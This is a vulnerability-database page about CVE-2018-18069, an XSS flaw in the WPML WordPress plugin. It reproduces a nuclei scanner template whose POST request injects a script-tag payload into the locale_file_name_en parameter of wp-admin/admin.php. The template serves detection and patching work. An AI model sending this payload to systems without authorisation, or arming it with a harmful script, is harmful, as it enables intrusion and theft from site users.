Lucene search
K

WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting vulnerability in process_form

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress WPML plugin cross-site scripting vulnerability
10 Oct 201800:00
cnvd
CVE
CVE-2018-18069
8 Oct 201822:00
cve
Cvelist
CVE-2018-18069
8 Oct 201822:00
cvelist
EUVD
EUVD-2018-9808
7 Oct 202500:30
euvd
NVD
CVE-2018-18069
8 Oct 201822:29
nvd
OSV
CVE-2018-18069
8 Oct 201822:29
osv
Prion
Design/Logic Flaw
8 Oct 201822:29
prion
wpexploit
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
8 Oct 201800:00
wpexploit
WPVulnDB
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
8 Oct 201800:00
wpvulndb
id: CVE-2018-18069

info:
  name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting
  author: nadino
  severity: medium
  description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability.
  reference:
    - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18069
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-18069
    cwe-id: CWE-79
    epss-score: 0.13207
    epss-percentile: 0.9589
    cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wpml
    product: wpml
    framework: wordpress
  tags: cve2018,cve,wordpress,xss,plugin,wpml,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin.php"

    body: |
      icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>
    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(header), "text/html")'
          - 'contains(set_cookie, "_icl_current_admin_language")'
          - 'contains(body, "\"><script>alert(0);</script>")'
        condition: and
# digest: 490a0046304402204ea6b1865c5ac7dc03427db5c482942dd31a599ed15755cc4bba2d4fb96fd3040220127a73fb27cc048315b587058bd8b4f41a3ed87618082e9e8a0937f221de67e4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 36.1
EPSS0.13207
29